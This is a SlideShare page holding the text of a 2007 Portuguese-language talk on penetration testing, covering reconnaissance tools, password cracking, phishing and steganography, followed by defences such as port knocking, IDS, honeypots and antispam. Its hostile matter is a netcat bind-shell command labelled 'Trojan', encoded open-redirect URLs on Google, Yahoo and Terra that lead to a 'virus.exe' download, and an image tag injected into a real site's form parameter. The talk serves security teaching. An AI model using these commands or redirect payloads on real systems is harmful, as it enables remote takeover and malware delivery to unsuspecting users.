SlideShare ist ein Scribd-Unternehmen logo
1 von 67
Downloaden Sie, um offline zu lesen
PENTEST
Técnicas de invasão e defesa




                   Cleber Souza Brandao
                      clebeer@gmail.com
Cleber Brandão
cbrandao@brc.com.br
About me

   Utilizo linux há 7 anos
   Aulas de linux Faculdades Radial
   Formado Gerenciamento de Redes
   Suporte e aulas Projeto Telecentros SP
   Participante do ISSA-Brasil
   Testes de performance e segurança
    BRconnection®
Tópicos
   Técnicas de Invasão         Técnicas contra Invasão


Definindo um alvo            Firewall + IDS
Recolhendo informações       HIDS
Ferramentas úteis            HoneyPots
Phishing                     Antispam
Esteganografia
Técnicas de invasão
   Engenharia social
   Brute Force
   Espionagem
   Segurança por obscuridade
Definindo um alvo
 Onde buscar informações?
google
myspace
orkut
google groups
Google
Buscas específicas
Utilizando recursos avançados do google como
 as tags Intitle, Inurl, Intext

Podem te trazer resultados muito interessantes.
Engenharia social
Adão e Eva
   Primeiras vitimas de engenharia social
Apenas 2 coisas no mundo são infinitas, o
     universo e a estupidez humana.
               (Albert Einstein)
Ferramentas úteis
   google                 sendip
   dig                    john the ripper
   nmap                   host
   nessus                 hping3
   Metasploit             netcat
   telnet
dig
   Uma ferramenta similar ou nslookup porém
    mais flexível, pode ser utilizada para fazer
    buscas como A,TXT, MX e NS.
dig +qr google.com any
;; ANSWER SECTION:
google.com.     10186 IN        MX   10 smtp2.google.com.
google.com.     10186 IN        MX   10 smtp3.google.com.
google.com.     10186 IN        MX   10 smtp4.google.com.
google.com.     10186 IN        MX   10 smtp1.google.com.
google.com.     318637 IN       NS   ns1.google.com.
google.com.     318637 IN       NS   ns2.google.com.
google.com.     318637 IN       NS   ns3.google.com.
google.com.     318637 IN       NS   ns4.google.com.

;; AUTHORITY SECTION:
google.com.     318637   IN     NS   ns2.google.com.
google.com.     318637   IN     NS   ns3.google.com.
google.com.     318637   IN     NS   ns4.google.com.
google.com.     318637   IN     NS   ns1.google.com.

;; ADDITIONAL SECTION:
smtp1.google.com.   2986   IN    A    72.14.203.25
smtp2.google.com.   2986   IN    A    64.233.167.25
smtp3.google.com.   2986   IN    A    64.233.183.25
smtp4.google.com.   2986   IN    A    72.14.215.25
ns1.google.com.   345220   IN    A    216.239.32.10
ns2.google.com.   345220   IN    A    216.239.34.10
ns3.google.com.   345219   IN    A    216.239.36.10
ns4.google.com.   345219   IN    A    216.239.38.10
PortScan
Nmap
   é o mais famoso portscan existente hoje.
    (www.insecure.org/nmap). É uma ótima
    ferramenta, muito utilizado por hackers, para
    descobrir falhas no sistema, em portas abertas
    desnecessariamente.
Nessus
   O Nessus é uma ferramenta de auditoria muito
    usada para detectar e corrigir vulnerabilidades
    nos PCs da rede local porem é muito utilizado
    por hackers para descobrir a vulnerabilidade de
    um alvo.
Reports

Nessus Scan Report
SUMMARY
- Number of hosts which were alive during the test : 1
- Number of security holes found : 1
- Number of security warnings found : 1
- Number of security notes found : 15
Reports

DETAILS


. List of open ports :
 o smtp (25/tcp) (Security notes found)
 o ssh (22/tcp) (Security notes found)
 o ftp (21/tcp) (Security notes found)
Reports
Information found on port smtp (25/tcp)
  An SMTP server is running on this port
  Here is its banner :
  220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
   2007 09:35:31 -0300; (No UCE/UBE) logging access from:
   localhost(OK)-localhost [127.0.0.1]
. Information found on port smtp (25/tcp)
  Remote SMTP server banner :
  220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov
   2007 09:35:57 -0300; (No UCE/UBE) logging access from:
   localhost(OK)-localhost [127.0.0.1]


  This is probably: Sendmail version 8.14.1
Reports

. Information found on port ssh (22/tcp)
  An ssh server is running on this port


. Information found on port ssh (22/tcp)
  Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
  Remote SSH supported authentication : publickey,password


  Remote SSH banner :
  CleBeer's |_b note.
Reports
Metasploit
      é um ambiente utilizado para escrever, testar, e
  executa códigos de exploit. Foi desenvolvido para prover
                       penetração
e testes em computadores relacionados a esse assunto, como
            também pesquisa de vulnerabilidade.
Metasploit
   Linha de comando



   Interface web
http://127.0.0.1:55555/
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br 80
Trying 200.189.171.181...
Connected to www.alvo.com.br.
Escape character is '^]'.


GET / HTTP/1.1
Host: www.alvo.com.br
Resultado
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://www.alvo.com.br/index.htm
Date: Thu, 01 Nov 2007 13:26:39 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
John the ripper
   Um programa usado para decifrar senhas
    suportado nas plataformas UNIX, DOS,
    WinNT?/Win95. É um programa disponível
    gratuitamente desenvolvido para decifrar
    senhas MD5, DES baseado na função CRYPT.
Usar senhas fortes?
Nem sempre é a solução
hping3
   Mais uma ferramenta capaz de enviar pacotes
    TCP, UDP e ICMP personalizados e receber
    respostas como consegue em icmp. Com ele
    você pode enviar arquivos encapsulados e é
    util para ataques DoS.
netcat
   Programa para consultoria de redes muito
    conhecido, isso deve-se ao fato de ele ser um
    programa muito versátil, podendo desde ser
    um simples telnet, portscan até um sniffer.
Trojan
nc -l -e /bin/bash -p 1033

A porta 1033 será colocada em listenning,
 redirecionaremos a saída de dados para um
 shell (/bin/bash). Assim quando alguém se
 conectar a essa porta terá domínio total sobre
 o computador.
Sniffer
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
Phishing
O que é phishing?

Phishing é um tipo de fraude projetada para
 roubar sua identidade. Em um phishing scam,
 uma pessoa mal-intencionada tenta obter
 informações como números de cartões de
 crédito, senhas, dados de contas ou outras
 informações pessoais convencendo você a
 fornecê-las sob pretextos enganosos.
Exemplos
Alguns sites famosos que permitem este tipo de
  fake:
google
yahoo
terra
Google
   http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-
    fXBJGSiQLU0eDSAueHkArnhtWZAu-
    FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-
    P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&a
    durl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e
    %6f%72%67%2f%76%69%72%75%73%2e%65%78%65
Yahoo
   http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=1
    29lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e
    %6e%6f%2d%69%70%2e%6f%72%67%2f
    %76%69%72%75%73%2e%65%78%65
Buscador terra
   http://buscador.terra.com.br/Redirector.aspx?
    bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=spon
    sored&partner=google&query=nike&position=1&target=%63%6c
    %65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f
    %72%67%2f%76%69%72%75%73%2e%65%78%65
Destino???
   Nas 3 URLs anteriores a requisição seria
    encaminhada para:


          clebeer.no-ip.org/virus.exe
Outro Exemplo


http://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Esteganografia
   Esteganografia basicamente é uma técnica de
    esconder um arquivo dentro de outro arquivo,
    podendo ser uma imagem , ou documento do
    Word até mesmo uma planilha de excel e etc
    só que de uma forma criptografada.
jp(hide an seek)
   O jphide e o jpseek são programas utilizados
    para esconder mensagens em arquivos JPEG.
origem.jpg
destino.jpg
msg.txt

Ola esta mensagem e secreta
e somente pessoas que possuam a senha podem vê-la


senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
Utilização
   Esconder mensagem:
jphide origem.jpg destino.jpg mensagem.txt

   Descobir mensagem:
jpseek destino.jpg texto-secreto.txt
Quanto vale?
   Trojan (Shell) - US$ 350,00 - US$700,00
   Trojan (Roubo de Senhas) - US$600,00
   Listagem E-mail (32 milhões) - US$1.500,00
   Milhões de Usuários do ICQ - US$150,00
   Proteção Contra Detecção do Trojan - US$20,00
   Suporte
Tecnicas contra invasão
   Firewall
   (NHWK)IDS
   HoneyPots
   Antispam
Firewall
   Port Knock, uma solução leve e fácil de
    configurar, permite que portas específicas só
    sejam abertas no momento desejado atraves
    de tentativas de conexão em portas
    específicas.
*IDS
   NIDS – Network Intrusion Detection System
   HIDS - Host-based Intrusion Detection System
   WIDS – Wireless Intrusion Detection System
   KIDS - Kernel Intrusion Detection System
Honeypot
   Útil para vigilância e alerta aos tipos de
    ataques mais utilizados porem deve ser
    utilizado com cuidado para que o invasor não
    tenha acesso a rede real.
Antispam
   Indispensável para qualquer MX, útil para evitar
    emails forjados e de domínios não confiaveis,
    pode ser incrementado com opções de RBL e
    CAPTCHA ("Completely Automated Public
    Turing test to tell Computers and Humans
    Apart").
Conclusão
   Com a popularidade do SL a informação ficou
    mais acessível o que colaborou para um maior
    avanço das técnicas de invasão, em contra
    partida os sistemas de segurança vem se
    tornando mais estáveis a casa dia.
Créditos
   www.google.com
   www.brc.com.br
   naopod.com.br
   spookerlabs.multiply.com
   http://cartilha.cert.br/malware/
Perguntas
OBRIGADO!

Weitere ähnliche Inhalte

Was ist angesagt?

Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoCleórbete Santos
 
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...Felipe Santos
 
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-MiddleFISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-MiddleFernando Mercês
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de SegurançaAlefe Variani
 
Pentest Invasão e Defesa - AnonFeh
Pentest   Invasão e Defesa - AnonFehPentest   Invasão e Defesa - AnonFeh
Pentest Invasão e Defesa - AnonFehPhillipe Martins
 
O submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasO submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasCleórbete Santos
 
Espionagem e Software Livre
Espionagem e Software LivreEspionagem e Software Livre
Espionagem e Software LivreÁtila Camurça
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandomarcusburghardt
 

Was ist angesagt? (20)

Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetração
 
Metodos de invasao
Metodos de invasaoMetodos de invasao
Metodos de invasao
 
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
Block Hosts: Bloqueando Ataques De ForçA Bruta (Brute Force) Em Ftp, Ssh E Ou...
 
Palestra Auditoria de Segurança em Redes sem Fio
Palestra Auditoria de Segurança em Redes sem FioPalestra Auditoria de Segurança em Redes sem Fio
Palestra Auditoria de Segurança em Redes sem Fio
 
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-MiddleFISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
FISL11: Protegendo webservers na intranet contra ataques Man-In-The-Middle
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de Segurança
 
Pentest Invasão e Defesa - AnonFeh
Pentest   Invasão e Defesa - AnonFehPentest   Invasão e Defesa - AnonFeh
Pentest Invasão e Defesa - AnonFeh
 
Invasão e Segurança
Invasão e SegurançaInvasão e Segurança
Invasão e Segurança
 
O submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesasO submundo dos hackers: ataques e defesas
O submundo dos hackers: ataques e defesas
 
Aula 8.0 - Segurança
Aula 8.0 - SegurançaAula 8.0 - Segurança
Aula 8.0 - Segurança
 
Espionagem e Software Livre
Espionagem e Software LivreEspionagem e Software Livre
Espionagem e Software Livre
 
teste de invasão
teste de invasãoteste de invasão
teste de invasão
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
 
Criptografia com PHP
Criptografia com PHPCriptografia com PHP
Criptografia com PHP
 
Vpn alan-rafael
Vpn alan-rafaelVpn alan-rafael
Vpn alan-rafael
 
Tunneling
TunnelingTunneling
Tunneling
 
Segurança básica de redes Wi-Fi
Segurança básica de redes Wi-FiSegurança básica de redes Wi-Fi
Segurança básica de redes Wi-Fi
 
Ataques na internet
Ataques na internetAtaques na internet
Ataques na internet
 
Aula 7 - Ataque de Força Bruta
Aula 7 - Ataque de Força BrutaAula 7 - Ataque de Força Bruta
Aula 7 - Ataque de Força Bruta
 
Botnets
BotnetsBotnets
Botnets
 

Ähnlich wie Pentest: Técnicas de invasão e defesa em redes

Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploitRoberto Soares
 
XSS Desvendado
XSS DesvendadoXSS Desvendado
XSS Desvendadoricardophp
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonTchelinux
 
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Marcelo Area Leao
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosSanger Dias
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 
Análise de malware com software livre
Análise de malware com software livreAnálise de malware com software livre
Análise de malware com software livreDiego Santos
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univemevandrovv
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Palestra criando aplicações seguras com php (2)
Palestra  criando aplicações seguras com php (2)Palestra  criando aplicações seguras com php (2)
Palestra criando aplicações seguras com php (2)Leandro Lugaresi
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux987123987123
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviJhonathan Davi
 
Back track apresentação
Back track   apresentaçãoBack track   apresentação
Back track apresentaçãoKleber Santos
 
Palestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetPalestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetFabrício Basto
 

Ähnlich wie Pentest: Técnicas de invasão e defesa em redes (20)

Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
 
XSS Desvendado
XSS DesvendadoXSS Desvendado
XSS Desvendado
 
Ferramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei PollonFerramentas GPL para segurança de redes - Vanderlei Pollon
Ferramentas GPL para segurança de redes - Vanderlei Pollon
 
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
Análise de malware com software livre
Análise de malware com software livreAnálise de malware com software livre
Análise de malware com software livre
 
Mini Curso - Pen Test - Univem
Mini Curso - Pen Test - UnivemMini Curso - Pen Test - Univem
Mini Curso - Pen Test - Univem
 
Inf seg redinf_semana5
Inf seg redinf_semana5Inf seg redinf_semana5
Inf seg redinf_semana5
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
Sniffers Parte 2
Sniffers   Parte 2Sniffers   Parte 2
Sniffers Parte 2
 
Sniffers Parte 1
Sniffers   Parte 1Sniffers   Parte 1
Sniffers Parte 1
 
Palestra criando aplicações seguras com php (2)
Palestra  criando aplicações seguras com php (2)Palestra  criando aplicações seguras com php (2)
Palestra criando aplicações seguras com php (2)
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux
 
Confraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan DaviConfraria0day - 11º Edição - Jhonathan Davi
Confraria0day - 11º Edição - Jhonathan Davi
 
Back track apresentação
Back track   apresentaçãoBack track   apresentação
Back track apresentação
 
Sniffers Parte 3
Sniffers   Parte 3Sniffers   Parte 3
Sniffers Parte 3
 
Segurança de redes
Segurança de redesSegurança de redes
Segurança de redes
 
Palestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetPalestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da Internet
 
Netfilter + Iptables
Netfilter + IptablesNetfilter + Iptables
Netfilter + Iptables
 

Mehr von Roberto Castro

Tutorial de instalacao_do_zabbix_2.0.0
Tutorial de instalacao_do_zabbix_2.0.0Tutorial de instalacao_do_zabbix_2.0.0
Tutorial de instalacao_do_zabbix_2.0.0Roberto Castro
 
Slide lpi mudancas lpic1
Slide lpi mudancas lpic1Slide lpi mudancas lpic1
Slide lpi mudancas lpic1Roberto Castro
 
O feng office open source
O feng office open sourceO feng office open source
O feng office open sourceRoberto Castro
 
Nfs protocol sequence_diagram
Nfs protocol sequence_diagramNfs protocol sequence_diagram
Nfs protocol sequence_diagramRoberto Castro
 
Livropfsense2 0ptbr-120227112435-phpapp02
Livropfsense2 0ptbr-120227112435-phpapp02Livropfsense2 0ptbr-120227112435-phpapp02
Livropfsense2 0ptbr-120227112435-phpapp02Roberto Castro
 
Aula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldapAula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldapRoberto Castro
 

Mehr von Roberto Castro (11)

Tutorial de instalacao_do_zabbix_2.0.0
Tutorial de instalacao_do_zabbix_2.0.0Tutorial de instalacao_do_zabbix_2.0.0
Tutorial de instalacao_do_zabbix_2.0.0
 
Slide lpi mudancas lpic1
Slide lpi mudancas lpic1Slide lpi mudancas lpic1
Slide lpi mudancas lpic1
 
O feng office open source
O feng office open sourceO feng office open source
O feng office open source
 
Nfs protocol sequence_diagram
Nfs protocol sequence_diagramNfs protocol sequence_diagram
Nfs protocol sequence_diagram
 
Mini curso hacker
Mini curso hackerMini curso hacker
Mini curso hacker
 
Livropfsense2 0ptbr-120227112435-phpapp02
Livropfsense2 0ptbr-120227112435-phpapp02Livropfsense2 0ptbr-120227112435-phpapp02
Livropfsense2 0ptbr-120227112435-phpapp02
 
Aula20 open vpn
Aula20 open vpnAula20 open vpn
Aula20 open vpn
 
Aula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldapAula14 vsftp de-introopenldap
Aula14 vsftp de-introopenldap
 
93511895 lm-87-ce
93511895 lm-87-ce93511895 lm-87-ce
93511895 lm-87-ce
 
2 virtualizacao
2 virtualizacao2 virtualizacao
2 virtualizacao
 
Servicos de internet
Servicos de internetServicos de internet
Servicos de internet
 

Pentest: Técnicas de invasão e defesa em redes

  • 1. PENTEST Técnicas de invasão e defesa Cleber Souza Brandao clebeer@gmail.com
  • 3. About me  Utilizo linux há 7 anos  Aulas de linux Faculdades Radial  Formado Gerenciamento de Redes  Suporte e aulas Projeto Telecentros SP  Participante do ISSA-Brasil  Testes de performance e segurança BRconnection®
  • 4. Tópicos  Técnicas de Invasão  Técnicas contra Invasão Definindo um alvo Firewall + IDS Recolhendo informações HIDS Ferramentas úteis HoneyPots Phishing Antispam Esteganografia
  • 5. Técnicas de invasão  Engenharia social  Brute Force  Espionagem  Segurança por obscuridade
  • 6. Definindo um alvo  Onde buscar informações? google myspace orkut google groups
  • 7. Google Buscas específicas Utilizando recursos avançados do google como as tags Intitle, Inurl, Intext Podem te trazer resultados muito interessantes.
  • 8.
  • 9.
  • 10.
  • 11.
  • 13. Adão e Eva  Primeiras vitimas de engenharia social
  • 14. Apenas 2 coisas no mundo são infinitas, o universo e a estupidez humana. (Albert Einstein)
  • 15. Ferramentas úteis  google  sendip  dig  john the ripper  nmap  host  nessus  hping3  Metasploit  netcat  telnet
  • 16. dig  Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  • 17. dig +qr google.com any ;; ANSWER SECTION: google.com. 10186 IN MX 10 smtp2.google.com. google.com. 10186 IN MX 10 smtp3.google.com. google.com. 10186 IN MX 10 smtp4.google.com. google.com. 10186 IN MX 10 smtp1.google.com. google.com. 318637 IN NS ns1.google.com. google.com. 318637 IN NS ns2.google.com. google.com. 318637 IN NS ns3.google.com. google.com. 318637 IN NS ns4.google.com. ;; AUTHORITY SECTION: google.com. 318637 IN NS ns2.google.com. google.com. 318637 IN NS ns3.google.com. google.com. 318637 IN NS ns4.google.com. google.com. 318637 IN NS ns1.google.com. ;; ADDITIONAL SECTION: smtp1.google.com. 2986 IN A 72.14.203.25 smtp2.google.com. 2986 IN A 64.233.167.25 smtp3.google.com. 2986 IN A 64.233.183.25 smtp4.google.com. 2986 IN A 72.14.215.25 ns1.google.com. 345220 IN A 216.239.32.10 ns2.google.com. 345220 IN A 216.239.34.10 ns3.google.com. 345219 IN A 216.239.36.10 ns4.google.com. 345219 IN A 216.239.38.10
  • 19. Nmap  é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  • 20. Nessus  O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  • 21. Reports Nessus Scan Report SUMMARY - Number of hosts which were alive during the test : 1 - Number of security holes found : 1 - Number of security warnings found : 1 - Number of security notes found : 15
  • 22. Reports DETAILS . List of open ports : o smtp (25/tcp) (Security notes found) o ssh (22/tcp) (Security notes found) o ftp (21/tcp) (Security notes found)
  • 23. Reports Information found on port smtp (25/tcp) An SMTP server is running on this port Here is its banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:31 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] . Information found on port smtp (25/tcp) Remote SMTP server banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:57 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] This is probably: Sendmail version 8.14.1
  • 24. Reports . Information found on port ssh (22/tcp) An ssh server is running on this port . Information found on port ssh (22/tcp) Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1 Remote SSH supported authentication : publickey,password Remote SSH banner : CleBeer's |_b note.
  • 26. Metasploit é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetração e testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.
  • 27. Metasploit  Linha de comando  Interface web
  • 31. telnet www.alvo.com.br 80 Trying 200.189.171.181... Connected to www.alvo.com.br. Escape character is '^]'. GET / HTTP/1.1 Host: www.alvo.com.br
  • 32. Resultado Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Location: http://www.alvo.com.br/index.htm Date: Thu, 01 Nov 2007 13:26:39 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  • 33. John the ripper  Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
  • 35.
  • 36. Nem sempre é a solução
  • 37. hping3  Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  • 38. netcat  Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  • 39. Trojan nc -l -e /bin/bash -p 1033 A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  • 40. Sniffer # nc -vv -z 75.126.176.71 -p 80 22 110 25 21 servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused servidor9.molservidores.com [75.126.176.71] 110 (pop3) open servidor9.molservidores.com [75.126.176.71] 25 (smtp) open servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  • 42. O que é phishing? Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal-intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
  • 43. Exemplos Alguns sites famosos que permitem este tipo de fake: google yahoo terra
  • 44. Google  http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&a durl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65%78%65
  • 45. Yahoo  http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=1 29lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e %6e%6f%2d%69%70%2e%6f%72%67%2f %76%69%72%75%73%2e%65%78%65
  • 46. Buscador terra  http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=spon sored&partner=google&query=nike&position=1&target=%63%6c %65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f %72%67%2f%76%69%72%75%73%2e%65%78%65
  • 47. Destino???  Nas 3 URLs anteriores a requisição seria encaminhada para: clebeer.no-ip.org/virus.exe
  • 49.
  • 51.
  • 52. Esteganografia  Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  • 53. jp(hide an seek)  O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  • 56. msg.txt Ola esta mensagem e secreta e somente pessoas que possuam a senha podem vê-la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
  • 57. Utilização  Esconder mensagem: jphide origem.jpg destino.jpg mensagem.txt  Descobir mensagem: jpseek destino.jpg texto-secreto.txt
  • 58. Quanto vale?  Trojan (Shell) - US$ 350,00 - US$700,00  Trojan (Roubo de Senhas) - US$600,00  Listagem E-mail (32 milhões) - US$1.500,00  Milhões de Usuários do ICQ - US$150,00  Proteção Contra Detecção do Trojan - US$20,00  Suporte
  • 59. Tecnicas contra invasão  Firewall  (NHWK)IDS  HoneyPots  Antispam
  • 60. Firewall  Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  • 61. *IDS  NIDS – Network Intrusion Detection System  HIDS - Host-based Intrusion Detection System  WIDS – Wireless Intrusion Detection System  KIDS - Kernel Intrusion Detection System
  • 62. Honeypot  Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  • 63. Antispam  Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
